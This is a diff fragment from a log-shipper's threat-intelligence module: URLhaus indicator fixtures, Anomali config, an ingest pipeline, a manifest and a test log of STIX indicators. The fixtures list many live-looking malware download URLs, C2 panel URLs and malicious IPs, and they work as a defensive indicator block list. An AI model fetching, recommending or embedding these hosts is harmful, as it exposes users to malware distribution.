"letonguesc.com", + "threatintel.indicator.first_seen": "2021-01-14T20:50:09.000Z", + "threatintel.indicator.provider": "Cryptolaemus1", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "letonguesc.com", + "threatintel.indicator.url.extension": "jpg", + "threatintel.indicator.url.original": "https://letonguesc.com/leto/NNTLRT68P28A717L/en.jpg", + "threatintel.indicator.url.path": "/leto/NNTLRT68P28A717L/en.jpg", + "threatintel.indicator.url.scheme": "https" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961461/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 30853, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": false, + "threatintel.abuseurl.tags": [ + "sLoad" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "offline", + "threatintel.indicator.domain": "univirtek.com", + "threatintel.indicator.first_seen": "2021-01-14T20:50:08.000Z", + "threatintel.indicator.provider": "Cryptolaemus1", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "univirtek.com", + "threatintel.indicator.url.extension": "png", + "threatintel.indicator.url.original": "https://univirtek.com/viro/CTTNDR89A19B149W/maps.png", + "threatintel.indicator.url.path": "/viro/CTTNDR89A19B149W/maps.png", + "threatintel.indicator.url.scheme": "https" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961462/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 31227, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": false, + "threatintel.abuseurl.tags": [ + "sLoad" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "offline", + "threatintel.indicator.domain": "cxminute.com", + "threatintel.indicator.first_seen": "2021-01-14T20:50:08.000Z", + "threatintel.indicator.provider": "Cryptolaemus1", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "cxminute.com", + "threatintel.indicator.url.extension": "css", + "threatintel.indicator.url.original": "https://cxminute.com/minu/DRSNTN77B16I197U/logo.css", + "threatintel.indicator.url.path": "/minu/DRSNTN77B16I197U/logo.css", + "threatintel.indicator.url.scheme": "https" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961463/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 31599, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": false, + "threatintel.abuseurl.tags": [ + "sLoad" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "offline", + "threatintel.indicator.domain": "univirtek.com", + "threatintel.indicator.first_seen": "2021-01-14T20:50:08.000Z", + "threatintel.indicator.provider": "Cryptolaemus1", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "univirtek.com", + "threatintel.indicator.url.extension": "css", + "threatintel.indicator.url.original": "https://univirtek.com/viro/02941830735/uk.css", + "threatintel.indicator.url.path": "/viro/02941830735/uk.css", + "threatintel.indicator.url.scheme": "https" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961458/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 31966, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": false, + "threatintel.abuseurl.tags": [ + "sLoad" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "offline", + "threatintel.indicator.domain": "belfetproduction.com", + "threatintel.indicator.first_seen": "2021-01-14T20:50:07.000Z", + "threatintel.indicator.provider": "Cryptolaemus1", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "belfetproduction.com", + "threatintel.indicator.url.extension": "css", + "threatintel.indicator.url.original": "https://belfetproduction.com/bella/MNSGCM91A04G240K/it.css", + "threatintel.indicator.url.path": "/bella/MNSGCM91A04G240K/it.css", + "threatintel.indicator.url.scheme": "https" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961459/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 32353, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": false, + "threatintel.abuseurl.tags": [ + "sLoad" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "offline", + "threatintel.indicator.domain": "ladiesincode.com", + "threatintel.indicator.first_seen": "2021-01-14T20:50:07.000Z", + "threatintel.indicator.provider": "Cryptolaemus1", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "ladiesincode.com", + "threatintel.indicator.url.extension": "jpg", + "threatintel.indicator.url.original": "https://ladiesincode.com/ladi/03108100615/it.jpg", + "threatintel.indicator.url.path": "/ladi/03108100615/it.jpg", + "threatintel.indicator.url.scheme": "https" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961460/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 32726, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": false, + "threatintel.abuseurl.tags": [ + "sLoad" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "offline", + "threatintel.indicator.domain": "cxminute.com", + "threatintel.indicator.first_seen": "2021-01-14T20:50:07.000Z", + "threatintel.indicator.provider": "Cryptolaemus1", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "cxminute.com", + "threatintel.indicator.url.extension": "png", + "threatintel.indicator.url.original": "https://cxminute.com/minu/PTACSM56A31F604X/en.png", + "threatintel.indicator.url.path": "/minu/PTACSM56A31F604X/en.png", + "threatintel.indicator.url.scheme": "https" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961455/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 33096, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": false, + "threatintel.abuseurl.tags": [ + "sLoad" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "offline", + "threatintel.indicator.domain": "univirtek.com", + "threatintel.indicator.first_seen": "2021-01-14T20:49:39.000Z", + "threatintel.indicator.provider": "Cryptolaemus1", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "univirtek.com", + "threatintel.indicator.url.extension": "gif", + "threatintel.indicator.url.original": "https://univirtek.com/viro/00183050368/en.gif", + "threatintel.indicator.url.path": "/viro/00183050368/en.gif", + "threatintel.indicator.url.scheme": "https" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961456/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 33463, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": false, + "threatintel.abuseurl.tags": [ + "sLoad" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "offline", + "threatintel.indicator.domain": "cxminute.com", + "threatintel.indicator.first_seen": "2021-01-14T20:49:39.000Z", + "threatintel.indicator.provider": "Cryptolaemus1", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "cxminute.com", + "threatintel.indicator.url.extension": "gif", + "threatintel.indicator.url.original": "https://cxminute.com/minu/TSNLSN58H30G912H/uk.gif", + "threatintel.indicator.url.path": "/minu/TSNLSN58H30G912H/uk.gif", + "threatintel.indicator.url.scheme": "https" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961457/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 33833, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": false, + "threatintel.abuseurl.tags": [ + "sLoad" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "offline", + "threatintel.indicator.domain": "letonguesc.com", + "threatintel.indicator.first_seen": "2021-01-14T20:49:39.000Z", + "threatintel.indicator.provider": "Cryptolaemus1", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "letonguesc.com", + "threatintel.indicator.url.extension": "gif", + "threatintel.indicator.url.original": "https://letonguesc.com/leto/08658331007/blank.gif", + "threatintel.indicator.url.path": "/leto/08658331007/blank.gif", + "threatintel.indicator.url.scheme": "https" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961450/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 34205, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": false, + "threatintel.abuseurl.tags": [ + "sLoad" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "offline", + "threatintel.indicator.domain": "cxminute.com", + "threatintel.indicator.first_seen": "2021-01-14T20:49:37.000Z", + "threatintel.indicator.provider": "Cryptolaemus1", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "cxminute.com", + "threatintel.indicator.url.extension": "png", + "threatintel.indicator.url.original": "https://cxminute.com/minu/01098910324/blank.png", + "threatintel.indicator.url.path": "/minu/01098910324/blank.png", + "threatintel.indicator.url.scheme": "https" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961451/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 34573, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": false, + "threatintel.abuseurl.tags": [ + "sLoad" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "offline", + "threatintel.indicator.domain": "univirtek.com", + "threatintel.indicator.first_seen": "2021-01-14T20:49:37.000Z", + "threatintel.indicator.provider": "Cryptolaemus1", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "univirtek.com", + "threatintel.indicator.url.extension": "css", + "threatintel.indicator.url.original": "https://univirtek.com/viro/02794390233/uk.css", + "threatintel.indicator.url.path": "/viro/02794390233/uk.css", + "threatintel.indicator.url.scheme": "https" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961452/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 34940, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": false, + "threatintel.abuseurl.tags": [ + "sLoad" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "offline", + "threatintel.indicator.domain": "univirtek.com", + "threatintel.indicator.first_seen": "2021-01-14T20:49:37.000Z", + "threatintel.indicator.provider": "Cryptolaemus1", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "univirtek.com", + "threatintel.indicator.url.extension": "css", + "threatintel.indicator.url.original": "https://univirtek.com/viro/CSTDNT69D63F754D/en.css", + "threatintel.indicator.url.path": "/viro/CSTDNT69D63F754D/en.css", + "threatintel.indicator.url.scheme": "https" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961453/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 35312, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": false, + "threatintel.abuseurl.tags": [ + "sLoad" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "offline", + "threatintel.indicator.domain": "univirtek.com", + "threatintel.indicator.first_seen": "2021-01-14T20:49:37.000Z", + "threatintel.indicator.provider": "Cryptolaemus1", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "univirtek.com", + "threatintel.indicator.url.extension": "jpg", + "threatintel.indicator.url.original": "https://univirtek.com/viro/GSTGNE91B06L219W/1x1.jpg", + "threatintel.indicator.url.path": "/viro/GSTGNE91B06L219W/1x1.jpg", + "threatintel.indicator.url.scheme": "https" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961454/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 35685, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": false, + "threatintel.abuseurl.tags": [ + "sLoad" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "offline", + "threatintel.indicator.domain": "univirtek.com", + "threatintel.indicator.first_seen": "2021-01-14T20:49:37.000Z", + "threatintel.indicator.provider": "Cryptolaemus1", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "univirtek.com", + "threatintel.indicator.url.extension": "jpg", + "threatintel.indicator.url.original": "https://univirtek.com/viro/03610140125/map.jpg", + "threatintel.indicator.url.path": "/viro/03610140125/map.jpg", + "threatintel.indicator.url.scheme": "https" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961448/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 36053, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": false, + "threatintel.abuseurl.tags": [ + "sLoad" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "offline", + "threatintel.indicator.domain": "belfetproduction.com", + "threatintel.indicator.first_seen": "2021-01-14T20:49:36.000Z", + "threatintel.indicator.provider": "Cryptolaemus1", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "belfetproduction.com", + "threatintel.indicator.url.extension": "png", + "threatintel.indicator.url.original": "https://belfetproduction.com/bella/CRRLRD74E09A462T/blank.png", + "threatintel.indicator.url.path": "/bella/CRRLRD74E09A462T/blank.png", + "threatintel.indicator.url.scheme": "https" + } +] \ No newline at end of file diff --git a/x-pack/filebeat/module/threatintel/anomali/_meta/fields.yml b/x-pack/filebeat/module/threatintel/anomali/_meta/fields.yml new file mode 100644 index 000000000000..69ab6e22e9ba --- /dev/null +++ b/x-pack/filebeat/module/threatintel/anomali/_meta/fields.yml @@ -0,0 +1,53 @@ +- name: anomali + type: group + description: > + Fields for Anomali Threat Intel + fields: + - name: id + type: keyword + description: > + The ID of the indicator. + - name: name + type: keyword + description: > + The name of the indicator. + - name: pattern + type: keyword + description: > + The pattern ID of the indicator. + - name: valid_from + type: date + description: > + When the indicator was first found or is considered valid. + - name: modified + type: date + description: > + When the indicator was last modified + - name: labels + type: keyword + description: > + The labels related to the indicator + - name: indicator + type: keyword + description: > + The value of the indicator, for example if the type is domain, this would be the value. + - name: description + type: keyword + description: > + A description of the indicator. + - name: title + type: keyword + description: > + Title describing the indicator. + - name: content + type: keyword + description: > + Extra text or descriptive content related to the indicator. + - name: type + type: keyword + description: > + The indicator type, can for example be "domain, email, FileHash-SHA256". + - name: object_marking_refs + type: keyword + description: > + The STIX reference object. \ No newline at end of file diff --git a/x-pack/filebeat/module/threatintel/anomali/config/config.yml b/x-pack/filebeat/module/threatintel/anomali/config/config.yml new file mode 100644 index 000000000000..19e58b4bc12d --- /dev/null +++ b/x-pack/filebeat/module/threatintel/anomali/config/config.yml @@ -0,0 +1,66 @@ +{{ if eq .input "httpjson" }} + +type: httpjson +config_version: "2" +interval: {{ .interval }} + +{{ if .username }} +auth.basic.user: {{ .username }} +{{ end }} +{{ if .password }} +auth.basic.password: {{ .password }} +{{ end }} +request.method: GET +{{ if .ssl }} + - request.ssl: {{ .ssl | tojson }} +{{ end }} +request.url: {{ .url }} +request.redirect.forward_headers: true +request.transforms: +- set: + target: header.Content-Type + value: application/vnd.oasis.taxii+json +- set: + target: header.Accept + value: application/vnd.oasis.taxii+json +- set: + target: header.Range + value: items 0-10000 +- set: + target: url.params.match[type] + value: {{ .types }} +- set: + target: url.params.added_after + value: '[[.cursor.timestamp]]' + default: '[[ formatDate (now (parseDuration "-{{ .first_interval }}")) "2006-01-02T15:04:05.999Z" ]]' + +response.split: + target: body.objects + +cursor: + timestamp: + value: '[[ .last_response.header.Get "X-TAXII-Date-Added-Last" ]]' + +{{ else if eq .input "file" }} + +type: log +paths: +{{ range $i, $path := .paths }} + - {{$path}} +{{ end }} +exclude_files: [".gz$"] + +{{ end }} + +tags: {{.tags | tojson}} +publisher_pipeline.disable_host: {{ inList .tags "forwarded" }} + +processors: + - decode_json_fields: + fields: [message] + document_id: id + target: json + - add_fields: + target: '' + fields: + ecs.version: 1.6.0 diff --git a/x-pack/filebeat/module/threatintel/anomali/ingest/pipeline.yml b/x-pack/filebeat/module/threatintel/anomali/ingest/pipeline.yml new file mode 100644 index 000000000000..0f16b62643a6 --- /dev/null +++ b/x-pack/filebeat/module/threatintel/anomali/ingest/pipeline.yml @@ -0,0 +1,131 @@ +description: Pipeline for parsing Anomali Threat Intel +processors: + +#################### +# Event ECS fields # +#################### +- set: + field: event.ingested + value: '{{_ingest.timestamp}}' +- set: + field: event.kind + value: enrichment +- set: + field: event.category + value: threat +- set: + field: event.type + value: indicator + +###################### +# General ECS fields # +###################### +- rename: + field: json + target_field: threatintel.anomali + ignore_missing: true + +##################### +# Threat ECS Fields # +##################### +## File indicator operations +- date: + field: threatintel.anomali.created + formats: + - "yyyy-MM-dd'T'HH:mm:ss.SSz" + - "yyyy-MM-dd'T'HH:mm:ss.SSZ" + - "yyyy-MM-dd'T'HH:mm:ss.SSSz" + - "yyyy-MM-dd'T'HH:mm:ss.SSSZ" + if: "ctx?.threatintel?.anomali?.created != null" +- date: + field: threatintel.anomali.modified + target_field: threatintel.anomali.modified + formats: + - "yyyy-MM-dd'T'HH:mm:ss.SSz" + - "yyyy-MM-dd'T'HH:mm:ss.SSZ" + - "yyyy-MM-dd'T'HH:mm:ss.SSSz" + - "yyyy-MM-dd'T'HH:mm:ss.SSSZ" + if: "ctx?.threatintel?.anomali?.created != null" +- date: + field: threatintel.anomali.valid_from + target_field: threatintel.anomali.valid_from + formats: + - "yyyy-MM-dd'T'HH:mm:ss.SSz" + - "yyyy-MM-dd'T'HH:mm:ss.SSZ" + - "yyyy-MM-dd'T'HH:mm:ss.SSSz" + - "yyyy-MM-dd'T'HH:mm:ss.SSSZ" + if: "ctx?.threatintel?.anomali?.created != null" +- grok: + field: threatintel.anomali.pattern + patterns: + - "^\\[%{DATA:_tmp.threattype}:value%{SPACE}=%{SPACE}'%{DATA:_tmp.threatvalue}'\\]" +- rename: + field: _tmp.threattype + target_field: threatintel.indicator.type + ignore_missing: true +- rename: + field: _tmp.threatvalue + target_field: threatintel.indicator.ip + ignore_missing: true + if: "['ipv4-addr', 'ipv6-addr'].contains(ctx?.threatintel?.indicator?.type)" +- uri_parts: + field: _tmp.threatvalue + target_field: threatintel.indicator.url + keep_original: true + remove_if_successful: true + if: ctx?.threatintel?.indicator?.type == 'url' +- rename: + field: _tmp.threatvalue + target_field: threatintel.indicator.url.full + ignore_missing: true + if: ctx?.threatintel?.indicator?.type == 'url' && ctx?.threatintel?.indicator?.url?.original == null +- rename: + field: _tmp.threatvalue + target_field: threatintel.indicator.email.address + ignore_missing: true + if: ctx?.threatintel?.indicator?.type == 'email-addr' +- rename: + field: _tmp.threatvalue + target_field: threatintel.indicator.domain + ignore_missing: true + if: ctx?.threatintel?.indicator?.type == 'domain-name' +- set: + field: threatintel.indicator.type + value: unknown + if: ctx?.threatintel?.indicator?.type == null +###################### +# Cleanup processors # +###################### +- script: + lang: painless + if: ctx?.threatintel != null + source: | + void handleMap(Map map) { + for (def x : map.values()) { + if (x instanceof Map) { + handleMap(x); + } else if (x instanceof List) { + handleList(x); + } + } + map.values().removeIf(v -> v == null); + } + void handleList(List list) { + for (def x : list) { + if (x instanceof Map) { + handleMap(x); + } else if (x instanceof List) { + handleList(x); + } + } + } + handleMap(ctx); +- remove: + field: + - threatintel.anomali.created + - message + ignore_missing: true +on_failure: +- set: + field: error.message + value: '{{ _ingest.on_failure_message }}' diff --git a/x-pack/filebeat/module/threatintel/anomali/manifest.yml b/x-pack/filebeat/module/threatintel/anomali/manifest.yml new file mode 100644 index 000000000000..b7b87d8fe66d --- /dev/null +++ b/x-pack/filebeat/module/threatintel/anomali/manifest.yml @@ -0,0 +1,22 @@ +module_version: 1.0 + +var: + - name: input + default: httpjson + - name: interval + default: 60m + - name: first_interval + default: 24h + - name: ssl + - name: types + default: indicators + - name: username + - name: password + - name: url + default: "https://otx.alienvault.com/api/v1/indicators/export" + - name: tags + default: [threatintel-anomali, forwarded] + +ingest_pipeline: + - ingest/pipeline.yml +input: config/config.yml diff --git a/x-pack/filebeat/module/threatintel/anomali/test/anomali_limo.ndjson.log b/x-pack/filebeat/module/threatintel/anomali/test/anomali_limo.ndjson.log new file mode 100644 index 000000000000..28d5b256ea9e --- /dev/null +++ b/x-pack/filebeat/module/threatintel/anomali/test/anomali_limo.ndjson.log @@ -0,0 +1,642 @@ +{"created":"2020-01-22T02:58:57.431Z","description":"TS ID: 55241332361; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--44c85d4f-45ca-4977-b693-c810bbfb7a28","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-76"],"modified":"2020-01-22T02:58:57.431Z","name":"mal_url: http://chol.cc/Work6/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://chol.cc/Work6/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-01-22T02:58:57.431Z"} +{"created":"2020-01-22T02:58:57.503Z","description":"TS ID: 55241332307; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime","id":"indicator--f9fe5c81-6869-4247-af81-62b7c8aba209","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-68"],"modified":"2020-01-22T02:58:57.503Z","name":"mal_url: http://worldatdoor.in/lewis/Panel/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://worldatdoor.in/lewis/Panel/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-01-22T02:58:57.503Z"} +{"created":"2020-01-22T02:58:57.57Z","description":"TS ID: 55241332302; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime","id":"indicator--b0e14122-9005-4776-99fc-00872476c6d1","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-71"],"modified":"2020-01-22T02:58:57.57Z","name":"mal_url: http://f0387770.xsph.ru/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://f0387770.xsph.ru/login']","type":"indicator","valid_from":"2020-01-22T02:58:57.57Z"} +{"created":"2020-01-22T02:58:59.366Z","description":"TS ID: 55241332312; iType: mal_url; State: active; Org: Digital Ocean; Source: CyberCrime","id":"indicator--111ec76f-616d-4aa8-80fd-e11ef0066aba","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-50"],"modified":"2020-01-22T02:58:59.366Z","name":"mal_url: http://178.62.187.103/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://178.62.187.103/login']","type":"indicator","valid_from":"2020-01-22T02:58:59.366Z"} +{"created":"2020-01-22T02:58:59.457Z","description":"TS ID: 55241332386; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--189ce776-6d7e-4e85-9222-de5876644988","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-66"],"modified":"2020-01-22T02:58:59.457Z","name":"mal_url: http://appareluea.com/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://appareluea.com/panel/admin.php']","type":"indicator","valid_from":"2020-01-22T02:58:59.457Z"} +{"created":"2020-01-22T02:59:06.402Z","description":"TS ID: 55241332391; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--a4144d34-b86d-475e-8047-eb46b48ee325","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-93"],"modified":"2020-01-22T02:59:06.402Z","name":"mal_url: http://nkpotu.xyz/Kpot3/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://nkpotu.xyz/Kpot3/login.php']","type":"indicator","valid_from":"2020-01-22T02:59:06.402Z"} +{"created":"2020-01-22T02:59:19.99Z","description":"TS ID: 55241332372; iType: mal_ip; State: active; Org: Unified Layer; Source: CyberCrime","id":"indicator--983d9c3d-b7f8-4345-b643-b1d18e6ac6b2","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-49"],"modified":"2020-01-22T02:59:19.99Z","name":"mal_ip: 162.144.128.116","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '162.144.128.116']","type":"indicator","valid_from":"2020-01-22T02:59:19.99Z"} +{"created":"2020-01-22T02:59:20.155Z","description":"TS ID: 55241332313; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime","id":"indicator--f9c6386b-dba2-41f9-8160-d307671e5c8e","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-79"],"modified":"2020-01-22T02:59:20.155Z","name":"mal_url: http://ntrcgroup.com/nze/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://ntrcgroup.com/nze/panel/admin.php']","type":"indicator","valid_from":"2020-01-22T02:59:20.155Z"} +{"created":"2020-01-22T02:59:25.521Z","description":"TS ID: 55241332350; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--98fad53e-5389-47f7-a3ff-44d334af2d6b","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-76"],"modified":"2020-01-22T02:59:25.521Z","name":"mal_url: http://chol.cc/Work8/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://chol.cc/Work8/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-01-22T02:59:25.521Z"} 